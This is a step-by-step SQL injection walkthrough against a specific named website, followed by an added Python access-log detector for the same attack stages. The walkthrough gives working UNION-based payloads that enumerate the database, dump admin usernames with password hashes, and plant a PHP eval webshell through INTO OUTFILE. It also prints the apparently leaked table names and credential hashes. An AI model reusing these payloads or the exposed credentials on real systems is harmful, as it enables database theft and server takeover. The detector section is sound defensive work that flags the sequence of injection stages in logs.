1. Check whether the application connects to the database as root

and ord(mid(user(),1,1))=114 # if the page returns normally the account is root; if it returns an error it is not root.
For example:

http://unisscan.cn/list.php?lei=246 and ord(mid(user(),1,1))=114 # returns normally
2. Guess the number of columns

http://unisscan.cn/list.php?lei=246 order by 31--
3. Find which columns are echoed in the page

http://unisscan.cn/list.php?lei=246 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,10,31-- # the echoed columns are 2 and 8
4. Gather information

http://unisscan.cn/list.php?lei=246 and 1=2 union select 1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,10,31--
root@localhost:uniscan:5.6.15
5. Dump the tables of the uniscan database

http://unisscan.cn/list.php?lei=246 and 1=2 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,10,31 from information_schema.tables where table_schema=database() --
Table names: admin,admin_log,attrs,attrs_bak,info,my_ad,news,news_lx,news_sort,re_thing,shuju,shuju_xx,signup,szsheng,szshi,topics,user_level,wangdian,yujing
6. Get all the columns of the admin table

http://unisscan.cn/list.php?lei=246 and 1=2 union select 1,concat(group_concat(distinct+column_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_name=0x61646D696E--
Columns: id,username,password,quanxian,zhiwei,quanxian1,biming,easyset,lx,chat
7. Final step: dump the data

http://unisscan.cn/list.php?lei=246 and 1=2 union select 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from uniscan.admin--
Account and password: admin:74d1a2ceca6456a14b3a3ecfa0e499ff,service:559ff8dd58c16ddcac08ffcf0a56a449
8. Use the DBA privilege to write a one-line webshell directly

http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,%27%3C?php%20eval($_POST[cmd])?%3E%27,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20into%20outfile%20%27V:\web\php\php5\PHP_Web\phpstat3.2\one.php%27
The web root path can be found through phpinfo.php, configuration files, and similar sources.
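The eight steps above leave a very recognisable trail in the web server's access log, even when the payload is URL-encoded as in step 8. The following detector is an added example (not part of the original post) that URL-decodes each request's query string and labels the stage of the walkthrough it matches: the `ord(mid(user()...))` privilege probe, the `ORDER BY` column count probe, `UNION SELECT`, `information_schema` enumeration, and `INTO OUTFILE`. The log lines, client IPs and timestamps are constructed for the example; only the `/list.php?lei=` request shape comes from the post.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access-log lines mirroring the walkthrough's stages.
# The last two requests are URL-encoded the way the post's step 8 is.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /list.php?lei=246 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /list.php?lei=246%20and%20ord(mid(user(),1,1))=114 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /list.php?lei=246%20order%20by%2031-- HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /list.php?lei=246%20and%201=2%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20-- HTTP/1.1" 200 7000
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /list.php?lei=246%20and%201=2%20union%20select%201,2,3%20into%20outfile%20%27C:%5Cweb%5Cone.php%27 HTTP/1.1" 200 5120
"""

# (stage label, regex applied to the URL-decoded, lower-cased query string)
SIGNATURES = [
    ("privilege-probe", re.compile(r"\bord\s*\(\s*mid\s*\(\s*user\s*\(\s*\)")),
    ("column-count-probe", re.compile(r"\border\s+by\s+\d+")),
    ("schema-enumeration", re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("file-write", re.compile(r"\binto\s+(out|dump)file\b")),
    ("union-injection", re.compile(r"\bunion\s+(all\s+)?select\b")),
]

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(query: str) -> list[str]:
    """Return the stage labels whose signature matches the decoded query string."""
    decoded = unquote_plus(query).lower()
    return [label for label, rx in SIGNATURES if rx.search(decoded)]


def scan_log(text: str) -> list[dict]:
    """Parse log lines and return one record per request that matches any signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path, _, query = m.group("path").partition("?")
        stages = classify(query)
        if stages:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "path": path, "stages": stages})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} {h["path"]} -> {", ".join(h["stages"])}')
```

The regexes are deliberately narrow and will miss comment-based or double-encoded obfuscation; their value is in surfacing the sequence (probe, column count, schema enumeration, file write) from one client within a short window, which is the pattern worth alerting on.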
